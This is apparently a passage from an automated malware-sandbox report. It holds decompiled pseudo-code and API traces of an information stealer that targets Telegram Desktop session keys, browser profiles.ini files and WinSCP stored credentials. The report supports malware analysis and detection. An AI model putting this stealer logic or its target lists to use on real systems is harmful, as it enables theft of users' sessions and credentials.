                                                                    					 *(_t186 + 0x10) =  *(_t186 + 0x10) & 0x00000000;
                                                                    					_v9016 = _t196;
                                                                    					 *(_t186 + 0x14) = 0x43c8e0;
                                                                    					_t163 =  &_v3012;
                                                                    					 *_t186 = 0;
                                                                    					E00404331(_t186,  &_v7012);
                                                                    					E00408B15( &_v3012,  &_v3012, _t188, 0x3e8, _t191,  *(_t186 + 0x10));
                                                                    					_t193 = _t196 + 0x1c;
                                                                    				}
                                                                    				_t146 = GetFileAttributesA( &_v2012);
                                                                    				if(_t146 != 0xffffffff && (_t146 & 0x00000010) == 0) {
                                                                    					_t194 = _t193 - 0x1c;
                                                                    					_t184 = _t194;
                                                                    					 *(_t184 + 0x10) =  *(_t184 + 0x10) & 0x00000000;
                                                                    					_v9016 = _t194;
                                                                    					 *((intOrPtr*)(_t184 + 0x14)) = _t191;
                                                                    					_t163 =  &_v4012;
                                                                    					 *_t184 = 0;
                                                                    					E00404331(_t184,  &_v7012);
                                                                    					E00408B15( &_v4012,  &_v4012, _t188, _t189, _t191,  *(_t184 + 0x10));
                                                                    				}
                                                                    				_t174 = _t189;
                                                                    				_t147 =  &_v7012;
                                                                    				do {
                                                                    					 *_t147 = 0;
                                                                    					_t147 = _t147 + 1;
                                                                    					_t174 = _t174 - 1;
                                                                    				} while (_t174 != 0);
                                                                    				_t175 = _t189;
                                                                    				_t148 =  &_v5012;
                                                                    				do {
                                                                    					 *_t148 = 0;
                                                                    					_t148 = _t148 + 1;
                                                                    					_t175 = _t175 - 1;
                                                                    				} while (_t175 != 0);
                                                                    				_t176 = _t189;
                                                                    				_t149 =  &_v6012;
                                                                    				do {
                                                                    					 *_t149 = 0;
                                                                    					_t149 = _t149 + 1;
                                                                    					_t176 = _t176 - 1;
                                                                    				} while (_t176 != 0);
                                                                    				_t177 = _t189;
                                                                    				_t150 =  &_v8012;
                                                                    				do {
                                                                    					 *_t150 = 0;
                                                                    					_t150 = _t150 + 1;
                                                                    					_t177 = _t177 - 1;
                                                                    				} while (_t177 != 0);
                                                                    				_t178 = _t189;
                                                                    				_t151 =  &_v9012;
                                                                    				do {
                                                                    					 *_t151 = 0;
                                                                    					_t151 = _t151 + 1;
                                                                    					_t178 = _t178 - 1;
                                                                    				} while (_t178 != 0);
                                                                    				_t179 = _t189;
                                                                    				_t152 =  &_v1012;
                                                                    				do {
                                                                    					 *_t152 = 0;
                                                                    					_t152 = _t152 + 1;
                                                                    					_t179 = _t179 - 1;
                                                                    				} while (_t179 != 0);
                                                                    				_t180 = _t189;
                                                                    				_t153 =  &_v3012;
                                                                    				do {
                                                                    					 *_t153 = 0;
                                                                    					_t153 = _t153 + 1;
                                                                    					_t180 = _t180 - 1;
                                                                    				} while (_t180 != 0);
                                                                    				_t181 = _t189;
                                                                    				_t154 =  &_v2012;
                                                                    				do {
                                                                    					 *_t154 = 0;
                                                                    					_t154 = _t154 + 1;
                                                                    					_t181 = _t181 - 1;
                                                                    				} while (_t181 != 0);
                                                                    				_t155 =  &_v4012;
                                                                    				do {
                                                                    					 *_t155 = 0;
                                                                    					_t155 = _t155 + 1;
                                                                    					_t189 = _t189 - 1;
                                                                    				} while (_t189 != 0);
                                                                    				return E0041DA9B(_t155, _t163, _v8 ^ _t192, _t188, _t189, _t191);
                                                                    			}


                                                                    APIs
                                                                    • lstrcatA.KERNEL32(?), ref: 00408D7A
                                                                    • lstrcatA.KERNEL32(?), ref: 00408D8D
                                                                    • lstrcatA.KERNEL32(?), ref: 00408DA0
                                                                    • lstrcatA.KERNEL32(?), ref: 00408DB3
                                                                    • lstrcatA.KERNEL32(?), ref: 00408DC6
                                                                    • lstrcatA.KERNEL32(?), ref: 00408DD4
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408DE7
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408DFB
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408E09
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408E1D
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408E2B
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408E3F
                                                                    • lstrcatA.KERNEL32(?), ref: 00408E4D
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408E5B
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408E6F
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408E7D
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408E91
                                                                    • lstrcatA.KERNEL32(?), ref: 00408E9F
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408EAD
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408EC1
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408ECF
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408EE3
                                                                    • lstrcatA.KERNEL32(?), ref: 00408EF1
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408EFF
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408F13
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 00408F20
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 00408F6A
                                                                      • Part of subcall function 00408B15: __EH_prolog3_GS.LIBCMT ref: 00408B1F
                                                                      • Part of subcall function 00408B15: GetProcessHeap.KERNEL32(00000000,0098967F,00000570,00408FA7,?), ref: 00408B37
                                                                      • Part of subcall function 00408B15: HeapAlloc.KERNEL32(00000000), ref: 00408B3E
                                                                      • Part of subcall function 00408B15: wsprintfA.USER32 ref: 00408B59
                                                                      • Part of subcall function 00408B15: FindFirstFileA.KERNEL32(?,?), ref: 00408B70
                                                                      • Part of subcall function 00408B15: StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00408B96
                                                                      • Part of subcall function 00408B15: StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00408BB0
                                                                      • Part of subcall function 00408B15: wsprintfA.USER32 ref: 00408BD7
                                                                      • Part of subcall function 00408B15: lstrcatA.KERNEL32(?), ref: 00408BFB
                                                                      • Part of subcall function 00408B15: lstrcatA.KERNEL32(?,00000000), ref: 00408C11
                                                                      • Part of subcall function 00408B15: CopyFileA.KERNEL32(?,?,00000001), ref: 00408C27
                                                                      • Part of subcall function 00408B15: DeleteFileA.KERNEL32(?), ref: 00408C43
                                                                      • Part of subcall function 00408B15: FindNextFileA.KERNEL32(?,?), ref: 00408C56
                                                                      • Part of subcall function 00408B15: FindClose.KERNEL32(?), ref: 00408C6A
                                                                      • Part of subcall function 00408B15: _memset.LIBCMT ref: 00408C79
                                                                      • Part of subcall function 00408B15: lstrcatA.KERNEL32(?), ref: 00408C8E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$File$Find$AttributesHeapwsprintf$AllocCloseCopyDeleteFirstH_prolog3_NextProcess_memset
                                                                    • String ID:
                                                                    • API String ID: 1902152991-0
                                                                    • Opcode ID: c81a09910405bd87e39942a975467373d73e6238d0610d6a6614170126663fe1
                                                                    • Instruction ID: 6c5f2112e7dd20d86226ab2040fd84824874cce3c12f39cf38b4b7984dd20594
                                                                    • Opcode Fuzzy Hash: c81a09910405bd87e39942a975467373d73e6238d0610d6a6614170126663fe1
                                                                    • Instruction Fuzzy Hash: 6EB191759001199FDF25DB64DC48AED7BBCEB1A315F0400EAF446E3291DB389B888F29
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 63%
                                                                    			E004133B9(void* __edx, intOrPtr* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				char _v804;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __ebp;
                                                                    				signed int _t35;
                                                                    				intOrPtr _t62;
                                                                    				intOrPtr _t63;
                                                                    				char* _t67;
                                                                    				char* _t69;
                                                                    				char* _t70;
                                                                    				char* _t71;
                                                                    				intOrPtr _t114;
                                                                    				intOrPtr _t115;
                                                                    				intOrPtr _t116;
                                                                    				intOrPtr _t117;
                                                                    				intOrPtr _t118;
                                                                    				intOrPtr _t119;
                                                                    				intOrPtr _t120;
                                                                    				intOrPtr _t121;
                                                                    				intOrPtr _t122;
                                                                    				intOrPtr _t123;
                                                                    				intOrPtr _t124;
                                                                    				intOrPtr _t125;
                                                                    				intOrPtr _t126;
                                                                    				intOrPtr _t127;
                                                                    				intOrPtr _t128;
                                                                    				intOrPtr _t129;
                                                                    				intOrPtr _t130;
                                                                    				intOrPtr _t131;
                                                                    				void* _t135;
                                                                    				void* _t138;
                                                                    				void* _t146;
                                                                    				void* _t147;
                                                                    				void* _t148;
                                                                    				intOrPtr _t150;
                                                                    				intOrPtr* _t152;
                                                                    				signed int _t153;
                                                                    				void* _t154;
                                                                    
                                                                    				_t154 = __eflags;
                                                                    				_t152 = __esi;
                                                                    				_t146 = __edx;
                                                                    				_t35 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t35 ^ _t153;
                                                                    				 *0x446250 = HeapAlloc(GetProcessHeap(), 0, 0x98967f);
                                                                    				 *((intOrPtr*)(__esi + 0xc)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 8)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 0x18)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 0x14)) = 0;
                                                                    				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                    				E004132E6(0, __esi, _t154, _a4, _a8);
                                                                    				_t150 =  *0x445ee8; // 0x4c98480
                                                                    				_t109 = __esi;
                                                                    				E00413159(__esi, _t146, _t150, _t154,  *0x4460a0);
                                                                    				_t151 =  *0x445bb4; // 0x4c984a8
                                                                    				E00413159(__esi, _t146, _t151, _t154,  *0x445e8c);
                                                                    				_push( *0x445fe4);
                                                                    				_push( *0x445d8c);
                                                                    				_push(__esi);
                                                                    				E00412D3C(__esi, _t146, _t151, __esi, _t154);
                                                                    				_push( *0x445ae4);
                                                                    				_push( *0x445db0);
                                                                    				_push(_t152);
                                                                    				E00412D3C(_t109, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445e24);
                                                                    				_t114 =  *0x445dc4; // 0x4c984e0
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t114, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445c08);
                                                                    				_t115 =  *0x446074; // 0x4c99988
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t115, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445f34);
                                                                    				_t116 =  *0x445bec; // 0x4c99ba8
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t116, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445e28);
                                                                    				_t117 =  *0x445e70; // 0x4c99ac8
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t117, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445e4c);
                                                                    				_t118 =  *0x4461c0; // 0x4c998e8
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t118, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x4460dc);
                                                                    				_t119 =  *0x445a9c; // 0x4c98508
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t119, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x446020);
                                                                    				_t120 =  *0x445df4; // 0x4c98530
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t120, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445aa8);
                                                                    				_t121 =  *0x445ff0; // 0x4c98560
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t121, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445df0);
                                                                    				_t122 =  *0x445c24; // 0x4c99750
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t122, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445bac);
                                                                    				_t123 =  *0x445c3c; // 0x4c99a88
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t123, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445de4);
                                                                    				_t124 =  *0x445e98; // 0x4c99ae8
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t124, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x446110);
                                                                    				_push(_t152);
                                                                    				_t125 =  *0x445abc; // 0x4c998a8
                                                                    				E00412B55(_t109, _t125, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445af8);
                                                                    				_t126 =  *0x445b90; // 0x4c999c8
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t126, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x4461c4);
                                                                    				_t127 =  *0x445f8c; // 0x4c99bc8
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t127, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445b70);
                                                                    				_t128 =  *0x445fa8; // 0x4c99bf0
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t128, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x4460b4);
                                                                    				_t129 =  *0x445a7c; // 0x4c99c18
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t129, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445b10);
                                                                    				_t130 =  *0x446040; // 0x4c9c088
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t130, _t146, _t151, _t152, _t154);
                                                                    				_push( *0x445cac);
                                                                    				_t131 =  *0x445ad8; // 0x4c9b400
                                                                    				_push(_t152);
                                                                    				E00412B55(_t109, _t131, _t146, _t151, _t152, _t154);
                                                                    				_t110 = 0;
                                                                    				_t155 =  *_t152;
                                                                    				if( *_t152 != 0) {
                                                                    					_push(_t152);
                                                                    					E00410CC2(0, _t151, _t152, _t155);
                                                                    					_t156 =  *_t152;
                                                                    					if( *_t152 != 0) {
                                                                    						E00411867(0, _t151, _t152, _t156);
                                                                    						E0041067C(0, _t151, _t152, _t156);
                                                                    						_t151 =  *0x445e7c; // 0x4c9a3e8
                                                                    						E00413159(_t152, _t146, _t151, _t156,  *0x445c38);
                                                                    						_t110 = 0;
                                                                    					}
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t152 + 5)) == _t110) {
                                                                    					L11:
                                                                    					_t62 =  *0x446230; // 0x0
                                                                    					 *((intOrPtr*)(_t152 + 0xc)) = _t62;
                                                                    					_t63 =  *0x44623c; // 0x0
                                                                    					 *((intOrPtr*)(_t152 + 0x10)) = _t63;
                                                                    					E0041CEBE( *0x446058,  *0x446320( *0x446250));
                                                                    					_t135 = 4;
                                                                    					_t67 = 0x446250;
                                                                    					do {
                                                                    						 *_t67 = _t110;
                                                                    						_t67 = _t67 + 1;
                                                                    						_t135 = _t135 - 1;
                                                                    					} while (_t135 != 0);
                                                                    					return E0041DA9B(_t67, _t110, _v8 ^ _t153, _t146, _t151, _t152);
                                                                    				} else {
                                                                    					_t138 = 0x104;
                                                                    					_t147 = 0x104;
                                                                    					_t69 =  &_v276;
                                                                    					do {
                                                                    						 *_t69 = _t110;
                                                                    						_t69 = _t69 + 1;
                                                                    						_t147 = _t147 - 1;
                                                                    					} while (_t147 != 0);
                                                                    					_t148 = 0x104;
                                                                    					_t70 =  &_v804;
                                                                    					do {
                                                                    						 *_t70 = _t110;
                                                                    						_t70 = _t70 + 1;
                                                                    						_t148 = _t148 - 1;
                                                                    					} while (_t148 != 0);
                                                                    					_t71 =  &_v540;
                                                                    					do {
                                                                    						 *_t71 = _t110;
                                                                    						_t71 = _t71 + 1;
                                                                    						_t138 = _t138 - 1;
                                                                    					} while (_t138 != 0);
                                                                    					lstrcatA( &_v276, E00416617(_t110, _t151, _t152, 0x1a));
                                                                    					lstrcatA( &_v276, "\\Telegr");
                                                                    					lstrcatA( &_v276, "am Desk");
                                                                    					lstrcatA( &_v276, "top\\");
                                                                    					lstrcatA( &_v804, "key_");
                                                                    					lstrcatA( &_v804, "datas");
                                                                    					lstrcatA( &_v540, "D877F783D5");
                                                                    					lstrcatA( &_v540, "D3EF8C");
                                                                    					lstrcatA( &_v540, "*");
                                                                    					_t151 = 0x43c8d8;
                                                                    					E00411117(_t152, _t148, 0x43c8d8,  &_v276,  &_v804);
                                                                    					E00411117(_t152, _t148, 0x43c8d8,  &_v276,  &_v540);
                                                                    					E00411117(_t152, _t148, 0x43c8d8,  &_v276, "map*");
                                                                    					E00411117(_t152, _t148, 0x43c8d8,  &_v276, "A7FDF864FBC10B77*");
                                                                    					E00411117(_t152, _t148, 0x43c8d8,  &_v276, "A92DAA6EA6F891F2*");
                                                                    					E00411117(_t152, _t148, 0x43c8d8,  &_v276, "F8806DD0C461824F*");
                                                                    					goto L11;
                                                                    				}
                                                                    			}













































                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000000,0098967F,0043C8D8,00000000), ref: 004133D6
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004133DD
                                                                      • Part of subcall function 00413159: _memset.LIBCMT ref: 00413185
                                                                      • Part of subcall function 00413159: _memset.LIBCMT ref: 00413197
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 004131AF
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,04C98480,?,?,?,?,?,?), ref: 004131BD
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004131D1
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,..\,?,?,?,?,?,?), ref: 004131E3
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043F250,?,?,?,?,?,?), ref: 004131F5
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043F254,?,?,?,?,?,?), ref: 00413207
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043F258,?,?,?,?,?,?), ref: 00413219
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043F25C,?,?,?,?,?,?), ref: 0041322B
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043F260,?,?,?,?,?,?), ref: 0041323D
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043EE58,?,?,?,?,?,?), ref: 0041324F
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043EE5C,?,?,?,?,?,?), ref: 00413261
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,0043EE64,?,?,?,?,?,?), ref: 00413273
                                                                      • Part of subcall function 00413159: lstrcatA.KERNEL32(?,.ini,?,?,?,?,?,?), ref: 00413285
                                                                      • Part of subcall function 00413159: GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?), ref: 00413292
                                                                      • Part of subcall function 00413159: FreeLibrary.KERNEL32(?,?,?,?,?,?), ref: 004132D1
                                                                      • Part of subcall function 00412D3C: __EH_prolog3_GS.LIBCMT ref: 00412D46
                                                                      • Part of subcall function 00412D3C: _memset.LIBCMT ref: 00412D88
                                                                      • Part of subcall function 00412D3C: _memset.LIBCMT ref: 00412D99
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(?,00000000,?,?,?,00000370,0041343D,?), ref: 00412DB1
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(?,04C9A4C8,?,?,?,00000370,0041343D,?), ref: 00412DBF
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(?,?,?,?,?,00000370,0041343D,?), ref: 00412DD2
                                                                      • Part of subcall function 00412D3C: StrCmpCA.SHLWAPI(?,?,?,?,00000370,0041343D,?), ref: 00412DEA
                                                                      • Part of subcall function 00412D3C: StrCmpCA.SHLWAPI(?,?,?,?,00000370,0041343D,?), ref: 00412E0A
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(=4A,00000000,?,?,?,00000370,0041343D,?), ref: 00412E2E
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(=4A,04C9A4C8,?,?,?,00000370,0041343D,?), ref: 00412E3C
                                                                      • Part of subcall function 00412D3C: _memset.LIBCMT ref: 00412E4B
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000370,0041343D,?), ref: 00412E61
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(?,0043C8E0,?,?,?,?,?,?,00000370,0041343D,?), ref: 00412E73
                                                                      • Part of subcall function 00412D3C: lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000370,0041343D,?), ref: 00412E86
                                                                      • Part of subcall function 00412D3C: GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00412EE5
                                                                      • Part of subcall function 00412B55: __EH_prolog3_GS.LIBCMT ref: 00412B5F
                                                                      • Part of subcall function 00412B55: _memset.LIBCMT ref: 00412B94
                                                                      • Part of subcall function 00412B55: lstrcatA.KERNEL32(?,00000000,?,?,?), ref: 00412BAC
                                                                      • Part of subcall function 00412B55: lstrcatA.KERNEL32(?), ref: 00412BBA
                                                                      • Part of subcall function 00412B55: _memset.LIBCMT ref: 00412BC9
                                                                      • Part of subcall function 00412B55: lstrcatA.KERNEL32(?,?), ref: 00412BDF
                                                                      • Part of subcall function 00412B55: lstrcatA.KERNEL32(?,0043C8E0), ref: 00412BF1
                                                                      • Part of subcall function 00412B55: lstrcatA.KERNEL32(?), ref: 00412C04
                                                                      • Part of subcall function 00412B55: GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00412C63
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413608
                                                                    • lstrcatA.KERNEL32(?,\Telegr), ref: 0041361A
                                                                    • lstrcatA.KERNEL32(?,am Desk), ref: 0041362C
                                                                    • lstrcatA.KERNEL32(?,top\), ref: 0041363E
                                                                    • lstrcatA.KERNEL32(?,key_), ref: 00413650
                                                                    • lstrcatA.KERNEL32(?,datas), ref: 00413662
                                                                    • lstrcatA.KERNEL32(?,D877F783D5), ref: 00413674
                                                                    • lstrcatA.KERNEL32(?,D3EF8C), ref: 00413686
                                                                    • lstrcatA.KERNEL32(?,0043EE4C), ref: 00413698
                                                                      • Part of subcall function 00410CC2: __EH_prolog3_GS.LIBCMT ref: 00410CCC
                                                                      • Part of subcall function 00410CC2: lstrcatA.KERNEL32(?,00000000,00000000,00000970,0041359F,?,?,?,?,?,?,?,?,?,?,?), ref: 00410D37
                                                                      • Part of subcall function 00410CC2: lstrcatA.KERNEL32(?), ref: 00410D4A
                                                                      • Part of subcall function 00410CC2: lstrcatA.KERNEL32(?), ref: 00410D5D
                                                                      • Part of subcall function 00410CC2: lstrcatA.KERNEL32(?,00000000), ref: 00410D73
                                                                      • Part of subcall function 00410CC2: lstrcatA.KERNEL32(?), ref: 00410D86
                                                                      • Part of subcall function 00410CC2: lstrcatA.KERNEL32(?,0043EE4C), ref: 00410D98
                                                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00413735
                                                                      • Part of subcall function 00411867: __EH_prolog3_GS.LIBCMT ref: 00411871
                                                                      • Part of subcall function 00411867: _memset.LIBCMT ref: 00411891
                                                                      • Part of subcall function 00411867: _memset.LIBCMT ref: 004118B7
                                                                      • Part of subcall function 00411867: _memset.LIBCMT ref: 004118CE
                                                                      • Part of subcall function 00411867: _memset.LIBCMT ref: 004118E5
                                                                      • Part of subcall function 00411867: RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,00000000,000003FF,?,?), ref: 00411940
                                                                      • Part of subcall function 0041067C: __EH_prolog3_GS.LIBCMT ref: 00410686
                                                                      • Part of subcall function 0041067C: lstrcatA.KERNEL32(?,00000000,000002B4,004135AD,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106AD
                                                                      • Part of subcall function 0041067C: lstrcatA.KERNEL32(?), ref: 004106C0
                                                                      • Part of subcall function 0041067C: GetFileAttributesA.KERNEL32(?), ref: 004106CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memset$H_prolog3_$AttributesFile$Heap$AllocFreeLibraryOpenProcesslstrlen
                                                                    • String ID: A7FDF864FBC10B77*$A92DAA6EA6F891F2*$D3EF8C$D877F783D5$F8806DD0C461824F*$\Telegr$am Desk$datas$key_$map*$top\
                                                                    • API String ID: 1858104327-3388137842
                                                                    • Opcode ID: 659d0d3468b882db7146e9531d40e2a62fbc2b1c1323ae8c440993606b56960e
                                                                    • Instruction ID: be27dc903460e2f85ebb8b929572482b6915c86958491e030e2f695d73b02eb9
                                                                    • Opcode Fuzzy Hash: 659d0d3468b882db7146e9531d40e2a62fbc2b1c1323ae8c440993606b56960e
                                                                    • Instruction Fuzzy Hash: 56918279500904AFCB16EF61EC45DEAB76DBB4F301B00406AF60193262DB796A85CB6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 97%
                                                                    			E00413159(void* __ebx, void* __edx, CHAR* __edi, void* __eflags, intOrPtr _a4) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				intOrPtr _v544;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t27;
                                                                    				int _t63;
                                                                    				void* _t65;
                                                                    				void* _t74;
                                                                    				signed int _t77;
                                                                    
                                                                    				_t75 = __edi;
                                                                    				_t74 = __edx;
                                                                    				_t69 = __ebx;
                                                                    				_t27 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t27 ^ _t77;
                                                                    				_v544 = _a4;
                                                                    				E00426300( &_v540, 0, 0x104);
                                                                    				E00426300( &_v276, 0, 0x104);
                                                                    				lstrcatA( &_v540, E00416617(__ebx, __edi, 0x104, 0x1a));
                                                                    				lstrcatA( &_v540, __edi);
                                                                    				lstrcatA( &_v276,  &_v540);
                                                                    				lstrcatA( &_v276, "..\\");
                                                                    				lstrcatA( &_v276, "p");
                                                                    				lstrcatA( &_v276, "r");
                                                                    				lstrcatA( &_v276, "o");
                                                                    				lstrcatA( &_v276, "f");
                                                                    				lstrcatA( &_v276, "i");
                                                                    				lstrcatA( &_v276, "l");
                                                                    				lstrcatA( &_v276, "e");
                                                                    				lstrcatA( &_v276, "s");
                                                                    				lstrcatA( &_v276, ".ini");
                                                                    				_t63 = GetFileAttributesA( &_v276);
                                                                    				if(_t63 != 0xffffffff && (_t63 & 0x00000010) == 0) {
                                                                    					_t65 = E00412FC2(__ebx, _t74, __edi, 0x104);
                                                                    					_t84 = _t65;
                                                                    					if(_t65 != 0) {
                                                                    						E0040B63D(__ebx, _t74, __edi, 0x104, _t84);
                                                                    						E0041048F(__ebx, 0x43c8d8,  &_v540, _v544,  *((intOrPtr*)(__ebx + 0x20)));
                                                                    					}
                                                                    					_t63 = FreeLibrary( *0x446240);
                                                                    				}
                                                                    				return E0041DA9B(_t63, _t69, _v8 ^ _t77, _t74, _t75, 0x104);
                                                                    			}















                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00413185
                                                                    • _memset.LIBCMT ref: 00413197
                                                                      • Part of subcall function 00416617: _memset.LIBCMT ref: 00416638
                                                                      • Part of subcall function 00416617: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00416650
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 004131AF
                                                                    • lstrcatA.KERNEL32(?,04C98480,?,?,?,?,?,?), ref: 004131BD
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004131D1
                                                                    • lstrcatA.KERNEL32(?,..\,?,?,?,?,?,?), ref: 004131E3
                                                                    • lstrcatA.KERNEL32(?,0043F250,?,?,?,?,?,?), ref: 004131F5
                                                                    • lstrcatA.KERNEL32(?,0043F254,?,?,?,?,?,?), ref: 00413207
                                                                    • lstrcatA.KERNEL32(?,0043F258,?,?,?,?,?,?), ref: 00413219
                                                                    • lstrcatA.KERNEL32(?,0043F25C,?,?,?,?,?,?), ref: 0041322B
                                                                    • lstrcatA.KERNEL32(?,0043F260,?,?,?,?,?,?), ref: 0041323D
                                                                    • lstrcatA.KERNEL32(?,0043EE58,?,?,?,?,?,?), ref: 0041324F
                                                                    • lstrcatA.KERNEL32(?,0043EE5C,?,?,?,?,?,?), ref: 00413261
                                                                    • lstrcatA.KERNEL32(?,0043EE64,?,?,?,?,?,?), ref: 00413273
                                                                    • lstrcatA.KERNEL32(?,.ini,?,?,?,?,?,?), ref: 00413285
                                                                    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?), ref: 00413292
                                                                      • Part of subcall function 00412FC2: GetEnvironmentVariableA.KERNEL32(PATH,00446F38,0000FFFF,04C98480,00000104,?,?,004132A6,?,?,?,?,?,?), ref: 00413000
                                                                      • Part of subcall function 00412FC2: _memset.LIBCMT ref: 00413015
                                                                      • Part of subcall function 00412FC2: lstrcatA.KERNEL32(?,00446F38,?,?,?,?,?,?,?,?,?), ref: 00413025
